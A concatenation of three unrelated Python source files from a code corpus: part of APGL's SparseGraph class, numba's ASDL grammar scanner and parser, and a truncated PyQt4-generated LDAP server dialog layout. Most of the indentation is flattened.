if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
raise ValueError("Both graphs must be either undirected or directed")
#The ideal way is to add both weight matrices together, but this results in a csr
#We'll just do this manually
nonZeros = numpy.nonzero(graph.W)
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = self.W.copy()
for i in range(len(nonZeros[0])):
ind1 = nonZeros[0][i]
ind2 = nonZeros[1][i]
newGraph.W[ind1, ind2] = self.W[ind1, ind2] + graph.W[ind1, ind2]
return newGraph
def multiply(self, graph):
"""
Multiply the edge weights of the input graph to the current one. Results in an
intersection of the edges.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with edge weights which are multiples of the current and graph
"""
Parameter.checkClass(graph, SparseGraph)
if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
raise ValueError("Both graphs must be either undirected or directed")
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = self.W.multiply(graph.W)
return newGraph
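    # A minimal sketch contrasting the two operations above: for graphs g1 and
    # g2 over the same vertex list, g1.add(g2) keeps an edge wherever either
    # graph has one (weights summed), while g1.multiply(g2) keeps an edge only
    # where both graphs have one (weights multiplied). In other words, add()
    # realises a union and multiply() an intersection of the edge sets.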
def copy(self):
"""
Returns a copy of this object, which also has a copy of the AbstractVertexList.
"""
newGraph = SparseGraph(self.vList.copy(), self.undirected)
newGraph.W = self.W.copy()
return newGraph
def complement(self):
"""
Returns a graph with identical vertices (same reference) to the current
one, but with the complement of the set of edges. Edges that do not exist
have weight 1. This makes a sparse graph dense.
        :returns: A new graph with edges complementing the current one.
"""
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = self.weightMatrixType()(numpy.ones((self.vList.getNumVertices(), self.vList.getNumVertices())))
A = self.nativeAdjacencyMatrix()
newGraph.W = newGraph.W - A
return newGraph
def setWeightMatrix(self, W):
"""
Set the weight matrix of this graph. Requires as input an ndarray or
a scipy sparse matrix with the same dimensions as the current weight
matrix. Edges are represented by non-zero edges.
:param W: The weight matrix to use.
:type W: :class:`ndarray` or :class:`scipy.sparse` matrix
"""
#Parameter.checkClass(W, numpy.ndarray)
if W.shape != (self.vList.getNumVertices(), self.vList.getNumVertices()):
raise ValueError("Weight matrix has wrong shape : " + str(W.shape))
if self.undirected and type(W) == numpy.ndarray and (W != W.T).any():
raise ValueError("Weight matrix of undirected graph must be symmetric")
if self.undirected and scipy.sparse.issparse(W) and not SparseUtils.equals(W, W.T):
raise ValueError("Weight matrix of undirected graph must be symmetric")
self.W = self.weightMatrixType()(W)
def setWeightMatrixSparse(self, W):
"""
Set the weight matrix of this graph. Requires as input a scipy sparse matrix with the
same dimensions as the current weight matrix. Edges are represented by
non-zero edges.
:param W: The weight matrix to use.
"""
if not sparse.issparse(W):
raise ValueError("Input must be a sparse matrix, not " + str(type(W)))
if W.shape != (self.vList.getNumVertices(), self.vList.getNumVertices()):
raise ValueError("Weight matrix has wrong shape : " + str(W.shape))
if self.undirected and (W - W.transpose()).nonzero()[0].shape[0]:
raise ValueError("Weight matrix of undirected graph must be symmetric")
self.W = W
def weightMatrixType(self):
"""
:returns: the type of the sparse matrix used to store edge weights.
"""
return type(self.W)
def removeEdge(self, vertexIndex1, vertexIndex2):
"""
Remove an edge between two vertices.
:param vertexIndex1: The index of the first vertex.
:type vertexIndex1: :class:`int`
:param vertexIndex2: The index of the second vertex.
:type vertexIndex2: :class:`int`
"""
super(SparseGraph, self).removeEdge(vertexIndex1, vertexIndex2)
self.W.eliminate_zeros()
def nativeAdjacencyMatrix(self):
"""
:returns: the adjacency matrix in the native sparse format.
"""
try:
self.W.eliminate_zeros()
except AttributeError:
pass
A = self.W/self.W
return A
def setDiff(self, graph):
"""
Find the edges in the current graph which are not present in the input
graph.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with edges from the current graph and not in the input graph.
"""
Parameter.checkClass(graph, SparseGraph)
if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
raise ValueError("Both graphs must be either undirected or directed")
A1 = self.nativeAdjacencyMatrix()
A2 = graph.nativeAdjacencyMatrix()
A1 = A1 - A2
A = (A1 + A1.multiply(A1))/2
A.prune()
newGraph = SparseGraph(self.vList, self.undirected)
newGraph.W = A
return newGraph
def getAllDirEdges(self):
"""
Returns the set of directed edges of the current graph as a matrix in which each
row corresponds to an edge. For an undirected graph, there is an edge from
v1 to v2 and from v2 to v1 if v2!=v1.
:returns: A matrix with 2 columns, and each row corresponding to an edge.
"""
(rows, cols) = numpy.nonzero(self.W)
edges = numpy.c_[rows, cols]
return edges
@staticmethod
def loadMatrix(filename):
W = scipy.io.mmread(filename)
return W.tolil()
def saveMatrix(self, W, filename):
scipy.io.mmwrite(filename, W)
def removeAllEdges(self):
"""
Removes all edges from this graph.
"""
self.W = self.W*0
#Weirdly we get nan values for the edges after doing the above line
if sparse.isspmatrix_csr(self.W) or sparse.isspmatrix_csc(self.W):
self.W.eliminate_zeros()
def concat(self, graph):
"""
        Take a new graph and concatenate it to the current one. Returns a new graph
        of the concatenated graphs with this graph's vertices first in the new list
        of vertices.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
"""
Parameter.checkClass(graph, SparseGraph)
if type(graph.getVertexList()) != type(self.getVertexList()):
raise ValueError("Vertex lists must be of same type")
if graph.isUndirected() != self.isUndirected():
raise ValueError("Graphs must be of the same directed type")
numVertices = self.getNumVertices() + graph.getNumVertices()
vList = GeneralVertexList(numVertices)
vList.setVertices(self.getVertexList().getVertices(), list(range(self.getNumVertices())))
vList.setVertices(graph.getVertexList().getVertices(), list(range(self.getNumVertices(), numVertices)))
newGraph = SparseGraph(vList)
W = scipy.sparse.bmat([[self.W, None], [None, graph.W]], format="csr")
newGraph.setWeightMatrixSparse(W)
return newGraph
def normalisedLaplacianSym(self, outDegree=True, sparse=False):
"""
Compute the normalised symmetric laplacian matrix using L = I - D^-1/2 W D^-1/2,
in which W is the weight matrix and D_ii is the sum of the ith vertices weights.
:param outDegree: whether to use the out-degree for the computation of the degree matrix
:type outDegree: :class:`bool`
:param sparse: whether to return a sparse matrix or numpy array
:type sparse: :class:`bool`
:returns: A normalised symmetric laplacian matrix
"""
W = self.getSparseWeightMatrix()
        if outDegree:
            degrees = numpy.array(W.sum(1)).ravel()
        else:
            degrees = numpy.array(W.sum(0)).ravel()
L = self.weightMatrixType()((self.getNumVertices(), self.getNumVertices()))
L.setdiag(numpy.ones(self.getNumVertices()))
D2 = self.weightMatrixType()((self.getNumVertices(), self.getNumVertices()))
D2.setdiag((degrees + (degrees==0))**-0.5)
L = L - D2.dot(W).dot(D2)
if sparse == True:
return L
else:
return L.toarray()
def laplacianMatrix(self, outDegree=True, sparse=False):
"""
Return the Laplacian matrix of this graph, which is defined as L_{ii} = deg(i)
L_{ij} = -1 if an edge between i and j, otherwise L_{ij} = 0 . For a directed
graph one can specify whether to use the out-degree or in-degree.
:param outDegree: whether to use the out-degree for the computation of the degree matrix
:type outDegree: :class:`bool`
:param sparse: whether to return a sparse matrix or numpy array
:type sparse: :class:`bool`
:returns: A laplacian adjacency matrix.
"""
A = self.nativeAdjacencyMatrix()
L = self.weightMatrixType()((self.getNumVertices(), self.getNumVertices()))
if outDegree:
L.setdiag(self.outDegreeSequence())
else:
L.setdiag(self.inDegreeSequence())
L = L - A
if sparse == True:
return L
else:
return L.toarray()
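    # A hypothetical usage sketch of the two Laplacians above, assuming a
    # populated SparseGraph `g`:
    #
    #     L = g.laplacianMatrix(sparse=True)            # combinatorial D - A
    #     Lsym = g.normalisedLaplacianSym(sparse=True)  # I - D^-1/2 W D^-1/2
    #
    # Both return a scipy.sparse matrix when sparse=True and a dense numpy
    # array otherwise.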
def toCsr(self):
"""
Convert the internal matrix representation to csr format (compressed sparse row)
in order to improve the efficiency of certain operations.
"""
self.W = self.W.tocsr()
def toCsc(self):
"""
Convert the internal matrix representation to csc format (compressed sparse column)
in order to improve the efficiency of certain operations.
"""
self.W = self.W.tocsc()
def __str__(self):
output= super(SparseGraph, self).__str__()
output += ", edge storage " + str(type(self.W))
return output
#Class data
W = None
vList = None
undirected = None
| charanpald/APGL | apgl/graph/SparseGraph.py | Python | bsd-3-clause | 19,320 | 0.008023 |
# -*- coding: utf-8 -*-
"""An implementation of the Zephyr Abstract Syntax Definition Language.
See http://asdl.sourceforge.net/ and
http://www.cs.princeton.edu/research/techreps/TR-554-97
Only supports top level module decl, not view. I'm guessing that view
is intended to support the browser and I'm not interested in the
browser.
Changes for Python: Add support for module versions
"""
from __future__ import print_function, division, absolute_import
import os
import traceback
from . import spark
class Token(object):
# spark seems to dispatch in the parser based on a token's
# type attribute
def __init__(self, type, lineno):
self.type = type
self.lineno = lineno
def __str__(self):
return self.type
def __repr__(self):
return str(self)
class Id(Token):
def __init__(self, value, lineno):
self.type = 'Id'
self.value = value
self.lineno = lineno
def __str__(self):
return self.value
class String(Token):
def __init__(self, value, lineno):
self.type = 'String'
self.value = value
self.lineno = lineno
class ASDLSyntaxError(Exception):
def __init__(self, lineno, token=None, msg=None):
self.lineno = lineno
self.token = token
self.msg = msg
def __str__(self):
if self.msg is None:
return "Error at '%s', line %d" % (self.token, self.lineno)
else:
return "%s, line %d" % (self.msg, self.lineno)
class ASDLScanner(spark.GenericScanner, object):
def tokenize(self, input):
self.rv = []
self.lineno = 1
super(ASDLScanner, self).tokenize(input)
return self.rv
def t_id(self, s):
r"[\w\.]+"
# XXX doesn't distinguish upper vs. lower, which is
# significant for ASDL.
self.rv.append(Id(s, self.lineno))
def t_string(self, s):
r'"[^"]*"'
self.rv.append(String(s, self.lineno))
def t_xxx(self, s): # not sure what this production means
r"<="
self.rv.append(Token(s, self.lineno))
def t_punctuation(self, s):
r"[\{\}\*\=\|\(\)\,\?\:]"
self.rv.append(Token(s, self.lineno))
def t_comment(self, s):
r"\-\-[^\n]*"
pass
def t_newline(self, s):
r"\n"
self.lineno += 1
def t_whitespace(self, s):
r"[ \t]+"
pass
def t_default(self, s):
r" . +"
raise ValueError("unmatched input: %r" % s)
class ASDLParser(spark.GenericParser, object):
def __init__(self):
super(ASDLParser, self).__init__("module")
def typestring(self, tok):
return tok.type
def error(self, tok):
raise ASDLSyntaxError(tok.lineno, tok)
def p_module_0(self, xxx_todo_changeme):
" module ::= Id Id version { } "
(module, name, version, _0, _1) = xxx_todo_changeme
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
        return Module(name, [], version)
def p_module(self, xxx_todo_changeme1):
" module ::= Id Id version { definitions } "
(module, name, version, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, definitions, version)
def p_module_1(self, xxx_todo_changeme1):
" module ::= Id Id { } "
        (module, name, _0, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
        return Module(name, [], None)
def p_module_2(self, xxx_todo_changeme1):
" module ::= Id Id { definitions } "
(module, name, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, definitions, None)
def p_version(self, xxx_todo_changeme2):
"version ::= Id String"
(version, V) = xxx_todo_changeme2
if version.value != "version":
raise ASDLSyntaxError(version.lineno,
msg="expected 'version', found %" % version)
return V
def p_definition_0(self, xxx_todo_changeme3):
" definitions ::= definition "
(definition,) = xxx_todo_changeme3
return definition
def p_definition_1(self, xxx_todo_changeme4):
" definitions ::= definition definitions "
(definitions, definition) = xxx_todo_changeme4
return definitions + definition
def p_definition(self, xxx_todo_changeme5):
" definition ::= Id = type "
(id, _, type) = xxx_todo_changeme5
return [Type(id, type)]
def p_type_0(self, xxx_todo_changeme6):
" type ::= product "
(product,) = xxx_todo_changeme6
return product
def p_type_1(self, xxx_todo_changeme7):
" type ::= sum "
(sum,) = xxx_todo_changeme7
return Sum(sum)
def p_type_2(self, xxx_todo_changeme8):
" type ::= sum Id ( fields ) "
(sum, id, _0, attributes, _1) = xxx_todo_changeme8
if id.value != "attributes":
raise ASDLSyntaxError(id.lineno,
msg="expected attributes, found %s" % id)
if attributes:
attributes.reverse()
return Sum(sum, attributes)
def p_product(self, xxx_todo_changeme9):
" product ::= ( fields ) "
(_0, fields, _1) = xxx_todo_changeme9
fields.reverse()
return Product(fields)
def p_sum_0(self, xxx_todo_changeme10):
" sum ::= constructor "
(constructor,) = xxx_todo_changeme10
return [constructor]
def p_sum_1(self, xxx_todo_changeme11):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme11
return [constructor] + sum
def p_sum_2(self, xxx_todo_changeme12):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme12
return [constructor] + sum
def p_constructor_0(self, xxx_todo_changeme13):
" constructor ::= Id "
(id,) = xxx_todo_changeme13
return Constructor(id)
def p_constructor_1(self, xxx_todo_changeme14):
" constructor ::= Id ( fields ) "
(id, _0, fields, _1) = xxx_todo_changeme14
fields.reverse()
return Constructor(id, fields)
def p_fields_0(self, xxx_todo_changeme15):
" fields ::= field "
(field,) = xxx_todo_changeme15
return [field]
def p_fields_1(self, xxx_todo_changeme16):
" fields ::= field , fields "
(field, _, fields) = xxx_todo_changeme16
return fields + [field]
def p_field_0(self, xxx_todo_changeme17):
" field ::= Id "
(type,) = xxx_todo_changeme17
return Field(type)
def p_field_1(self, xxx_todo_changeme18):
" field ::= Id Id "
(type, name) = xxx_todo_changeme18
return Field(type, name)
def p_field_2(self, xxx_todo_changeme19):
" field ::= Id * Id "
(type, _, name) = xxx_todo_changeme19
return Field(type, name, seq=True)
def p_field_3(self, xxx_todo_changeme20):
" field ::= Id ? Id "
(type, _, name) = xxx_todo_changeme20
return Field(type, name, opt=True)
def p_field_4(self, xxx_todo_changeme21):
" field ::= Id * "
(type, _) = xxx_todo_changeme21
return Field(type, seq=True)
def p_field_5(self, xxx_todo_changeme22):
" field ::= Id ? "
(type, _) = xxx_todo_changeme22
return Field(type, opt=True)
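# For orientation, a module this grammar accepts looks like (illustrative):
#
#   module Demo version "1.0" {
#       stmt = Pass | Expr(expr value)
#       expr = (int n, string? label)
#   }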
builtin_types = ("identifier", "string", "int", "bool", "object", "bytes")
# below is a collection of classes to capture the AST of an AST :-)
# not sure if any of the methods are useful yet, but I'm adding them
# piecemeal as they seem helpful
class AST(object):
pass # a marker class
class Module(AST):
def __init__(self, name, dfns, version):
self.name = name
self.dfns = dfns
self.version = version
self.types = {} # maps type name to value (from dfns)
        for type in (dfns or []):  # dfns may be None for an empty module
self.types[type.name.value] = type.value
def __repr__(self):
return "Module(%s, %s)" % (self.name, self.dfns)
class Type(AST):
def __init__(self, name, value):
self.name = name
self.value = value
def __repr__(self):
return "Type(%s, %s)" % (self.name, self.value)
class Constructor(AST):
def __init__(self, name, fields=None):
self.name = name
self.fields = fields or []
def __repr__(self):
return "Constructor(%s, %s)" % (self.name, self.fields)
class Field(AST):
def __init__(self, type, name=None, seq=False, opt=False):
self.type = type
self.name = name
self.seq = seq
self.opt = opt
def __repr__(self):
if self.seq:
extra = ", seq=True"
elif self.opt:
extra = ", opt=True"
else:
extra = ""
if self.name is None:
return "Field(%s%s)" % (self.type, extra)
else:
return "Field(%s, %s%s)" % (self.type, self.name, extra)
class Sum(AST):
def __init__(self, types, attributes=None):
self.types = types
self.attributes = attributes or []
def __repr__(self):
if self.attributes is None:
return "Sum(%s)" % self.types
else:
return "Sum(%s, %s)" % (self.types, self.attributes)
class Product(AST):
def __init__(self, fields):
self.fields = fields
def __repr__(self):
return "Product(%s)" % self.fields
class VisitorBase(object):
def __init__(self, skip=False):
self.cache = {}
self.skip = skip
def visit(self, object, *args):
meth = self._dispatch(object)
if meth is None:
return
try:
meth(object, *args)
except Exception as err:
print(("Error visiting", repr(object)))
print(err)
traceback.print_exc()
# XXX hack
if hasattr(self, 'file'):
self.file.flush()
os._exit(1)
def _dispatch(self, object):
assert isinstance(object, AST), repr(object)
klass = object.__class__
meth = self.cache.get(klass)
if meth is None:
methname = "visit" + klass.__name__
if self.skip:
meth = getattr(self, methname, None)
else:
meth = getattr(self, methname)
self.cache[klass] = meth
return meth
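# Dispatch is by class name: visiting a Constructor node calls
# visitConstructor(node, *args), and the resolved method is cached per class.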
class Check(VisitorBase):
def __init__(self):
super(Check, self).__init__(skip=True)
self.cons = {}
self.errors = 0
self.types = {}
def visitModule(self, mod):
for dfn in mod.dfns:
self.visit(dfn)
def visitType(self, type):
self.visit(type.value, str(type.name))
def visitSum(self, sum, name):
for t in sum.types:
self.visit(t, name)
def visitConstructor(self, cons, name):
key = str(cons.name)
conflict = self.cons.get(key)
if conflict is None:
self.cons[key] = name
else:
print(("Redefinition of constructor %s" % key))
print(("Defined in %s and %s" % (conflict, name)))
self.errors += 1
for f in cons.fields:
self.visit(f, key)
def visitField(self, field, name):
key = str(field.type)
l = self.types.setdefault(key, [])
l.append(name)
def visitProduct(self, prod, name):
for f in prod.fields:
self.visit(f, name)
def check(mod):
v = Check()
v.visit(mod)
for t in v.types:
if t not in mod.types and not t in builtin_types:
v.errors += 1
uses = ", ".join(v.types[t])
print(("Undefined type %s, used in %s" % (t, uses)))
return not v.errors
def parse(file):
scanner = ASDLScanner()
parser = ASDLParser()
    with open(file) as f:
        buf = f.read()
tokens = scanner.tokenize(buf)
try:
return parser.parse(tokens)
except ASDLSyntaxError as err:
print(err)
lines = buf.split("\n")
print((lines[err.lineno - 1])) # lines starts at 0, files at 1
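# Illustrative usage ("python.asdl" is a hypothetical path):
#   mod = parse("python.asdl")
#   if mod is not None and check(mod):
#       print(sorted(mod.types))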
if __name__ == "__main__":
import glob
import sys
if len(sys.argv) > 1:
files = sys.argv[1:]
else:
testdir = "tests"
files = glob.glob(testdir + "/*.asdl")
for file in files:
print(file)
mod = parse(file)
print(("module", mod.name))
print((len(mod.dfns), "definitions"))
if not check(mod):
print("Check failed")
else:
for dfn in mod.dfns:
                print(dfn.name, dfn.value)
| shiquanwang/numba | numba/asdl/common/asdl.py | Python | bsd-2-clause | 13,170 | 0.001974 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/mnt/debris/devel/repo/git/luma-fixes/resources/forms/ServerDialogDesign.ui'
#
# Created: Wed May 25 21:41:09 2011
# by: PyQt4 UI code generator 4.8.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_ServerDialogDesign(object):
def setupUi(self, ServerDialogDesign):
ServerDialogDesign.setObjectName(_fromUtf8("ServerDialogDesign"))
ServerDialogDesign.resize(662, 430)
ServerDialogDesign.setMinimumSize(QtCore.QSize(550, 350))
self.vboxlayout = QtGui.QVBoxLayout(ServerDialogDesign)
self.vboxlayout.setObjectName(_fromUtf8("vboxlayout"))
self.splitter = QtGui.QSplitter(ServerDialogDesign)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.splitter.sizePolicy().hasHeightForWidth())
self.splitter.setSizePolicy(sizePolicy)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName(_fromUtf8("splitter"))
self.layout3 = QtGui.QWidget(self.splitter)
self.layout3.setObjectName(_fromUtf8("layout3"))
self.serverListGrid = QtGui.QGridLayout(self.layout3)
self.serverListGrid.setMargin(0)
self.serverListGrid.setObjectName(_fromUtf8("serverListGrid"))
self.serverListView = QtGui.QListView(self.layout3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.serverListView.sizePolicy().hasHeightForWidth())
self.serverListView.setSizePolicy(sizePolicy)
self.serverListView.setObjectName(_fromUtf8("serverListView"))
self.serverListGrid.addWidget(self.serverListView, 0, 0, 1, 2)
self.addButton = QtGui.QPushButton(self.layout3)
self.addButton.setAutoDefault(True)
self.addButton.setDefault(False)
self.addButton.setObjectName(_fromUtf8("addButton"))
self.serverListGrid.addWidget(self.addButton, 1, 0, 1, 1)
self.deleteButton = QtGui.QPushButton(self.layout3)
self.deleteButton.setAutoDefault(True)
self.deleteButton.setObjectName(_fromUtf8("deleteButton"))
self.serverListGrid.addWidget(self.deleteButton, 1, 1, 1, 1)
self.testConnectionButton = QtGui.QPushButton(self.layout3)
self.testConnectionButton.setObjectName(_fromUtf8("testConnectionButton"))
self.serverListGrid.addWidget(self.testConnectionButton, 2, 0, 1, 2)
self.tabWidget = QtGui.QTabWidget(self.splitter)
self.tabWidget.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(48, 48))
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.networkTab = QtGui.QWidget()
self.networkTab.setObjectName(_fromUtf8("networkTab"))
self.gridlayout = QtGui.QGridLayout(self.networkTab)
self.gridlayout.setObjectName(_fromUtf8("gridlayout"))
self.networkIcon = QtGui.QLabel(self.networkTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.networkIcon.sizePolicy().hasHeightForWidth())
self.networkIcon.setSizePolicy(sizePolicy)
self.networkIcon.setMinimumSize(QtCore.QSize(48, 48))
self.networkIcon.setText(_fromUtf8(""))
self.networkIcon.setObjectName(_fromUtf8("networkIcon"))
self.gridlayout.addWidget(self.networkIcon, 0, 0, 1, 1)
self.networkOptGrid = QtGui.QGridLayout()
self.networkOptGrid.setObjectName(_fromUtf8("networkOptGrid"))
self.networkGroup = QtGui.QGroupBox(self.networkTab)
self.networkGroup.setObjectName(_fromUtf8("networkGroup"))
self.gridLayout_5 = QtGui.QGridLayout(self.networkGroup)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.networkGrid = QtGui.QGridLayout()
self.networkGrid.setObjectName(_fromUtf8("networkGrid"))
self.hostLabel = QtGui.QLabel(self.networkGroup)
self.hostLabel.setObjectName(_fromUtf8("hostLabel"))
self.networkGrid.addWidget(self.hostLabel, 0, 0, 1, 1)
self.hostEdit = QtGui.QLineEdit(self.networkGroup)
self.hostEdit.setObjectName(_fromUtf8("hostEdit"))
self.networkGrid.addWidget(self.hostEdit, 0, 1, 1, 1)
self.portLabel = QtGui.QLabel(self.networkGroup)
self.portLabel.setObjectName(_fromUtf8("portLabel"))
self.networkGrid.addWidget(self.portLabel, 2, 0, 1, 1)
self.portSpinBox = QtGui.QSpinBox(self.networkGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.portSpinBox.sizePolicy().hasHeightForWidth())
self.portSpinBox.setSizePolicy(sizePolicy)
self.portSpinBox.setMaximum(99999)
self.portSpinBox.setProperty(_fromUtf8("value"), 389)
self.portSpinBox.setObjectName(_fromUtf8("portSpinBox"))
self.networkGrid.addWidget(self.portSpinBox, 2, 1, 1, 1)
self.gridLayout_5.addLayout(self.networkGrid, 0, 0, 1, 1)
self.networkOptGrid.addWidget(self.networkGroup, 0, 0, 1, 1)
self.LDAPGroup = QtGui.QGroupBox(self.networkTab)
self.LDAPGroup.setObjectName(_fromUtf8("LDAPGroup"))
self.gridLayout_7 = QtGui.QGridLayout(self.LDAPGroup)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.LDAPGrid = QtGui.QGridLayout()
self.LDAPGrid.setObjectName(_fromUtf8("LDAPGrid"))
self.aliasBox = QtGui.QCheckBox(self.LDAPGroup)
self.aliasBox.setEnabled(False)
self.aliasBox.setObjectName(_fromUtf8("aliasBox"))
self.LDAPGrid.addWidget(self.aliasBox, 0, 0, 1, 2)
self.baseDNBox = QtGui.QCheckBox(self.LDAPGroup)
self.baseDNBox.setObjectName(_fromUtf8("baseDNBox"))
self.LDAPGrid.addWidget(self.baseDNBox, 1, 0, 1, 2)
self.baseDNLabel = QtGui.QLabel(self.LDAPGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.baseDNLabel.sizePolicy().hasHeightForWidth())
self.baseDNLabel.setSizePolicy(sizePolicy)
self.baseDNLabel.setObjectName(_fromUtf8("baseDNLabel"))
self.LDAPGrid.addWidget(self.baseDNLabel, 2, 0, 1, 1)
self.baseDNEdit = QtGui.QLineEdit(self.LDAPGroup)
self.baseDNEdit.setObjectName(_fromUtf8("baseDNEdit"))
self.LDAPGrid.addWidget(self.baseDNEdit, 2, 1, 1, 1)
self.hLayout = QtGui.QHBoxLayout()
self.hLayout.setObjectName(_fromUtf8("hLayout"))
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.hLayout.addItem(spacerItem)
self.addBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.addBaseDNButton.setAutoDefault(False)
self.addBaseDNButton.setObjectName(_fromUtf8("addBaseDNButton"))
self.hLayout.addWidget(self.addBaseDNButton)
self.deleteBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.deleteBaseDNButton.setAutoDefault(False)
self.deleteBaseDNButton.setObjectName(_fromUtf8("deleteBaseDNButton"))
self.hLayout.addWidget(self.deleteBaseDNButton)
self.LDAPGrid.addLayout(self.hLayout, 3, 1, 1, 1)
self.baseDNListWidget = QtGui.QListWidget(self.LDAPGroup)
self.baseDNListWidget.setObjectName(_fromUtf8("baseDNListWidget"))
self.LDAPGrid.addWidget(self.baseDNListWidget, 4, 0, 1, 2)
self.gridLayout_7.addLayout(self.LDAPGrid, 0, 0, 1, 1)
self.networkOptGrid.addWidget(self.LDAPGroup, 1, 0, 1, 1)
self.gridlayout.addLayout(self.networkOptGrid, 0, 1, 2, 2)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridlayout.addItem(spacerItem1, 1, 0, 1, 1)
self.tabWidget.addTab(self.networkTab, _fromUtf8(""))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.gridLayout_3 = QtGui.QGridLayout(self.tab)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.bindOptGroup = QtGui.QGroupBox(self.tab)
self.bindOptGroup.setObjectName(_fromUtf8("bindOptGroup"))
self.gridLayout_8 = QtGui.QGridLayout(self.bindOptGroup)
self.gridLayout_8.setObjectName(_fromUtf8("gridLayout_8"))
self.bindOptGrid = QtGui.QGridLayout()
self.bindOptGrid.setObjectName(_fromUtf8("bindOptGrid"))
self.bindAnonBox = QtGui.QCheckBox(self.bindOptGroup)
self.bindAnonBox.setChecked(True)
self.bindAnonBox.setObjectName(_fromUtf8("bindAnonBox"))
self.bindOptGrid.addWidget(self.bindAnonBox, 0, 0, 1, 2)
self.mechanismLabel = QtGui.QLabel(self.bindOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mechanismLabel.sizePolicy().hasHeightForWidth())
self.mechanismLabel.setSizePolicy(sizePolicy)
self.mechanismLabel.setObjectName(_fromUtf8("mechanismLabel"))
self.bindOptGrid.addWidget(self.mechanismLabel, 1, 0, 1, 1)
self.mechanismBox = QtGui.QComboBox(self.bindOptGroup)
self.mechanismBox.setEnabled(False)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mechanismBox.sizePolicy().hasHeightForWidth())
self.mechanismBox.setSizePolicy(sizePolicy)
self.mechanismBox.setObjectName(_fromUtf8("mechanismBox"))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.bindOptGrid.addWidget(self.mechanismBox, 1, 1, 1, 1)
self.bindAsLabel = QtGui.QLabel(self.bindOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
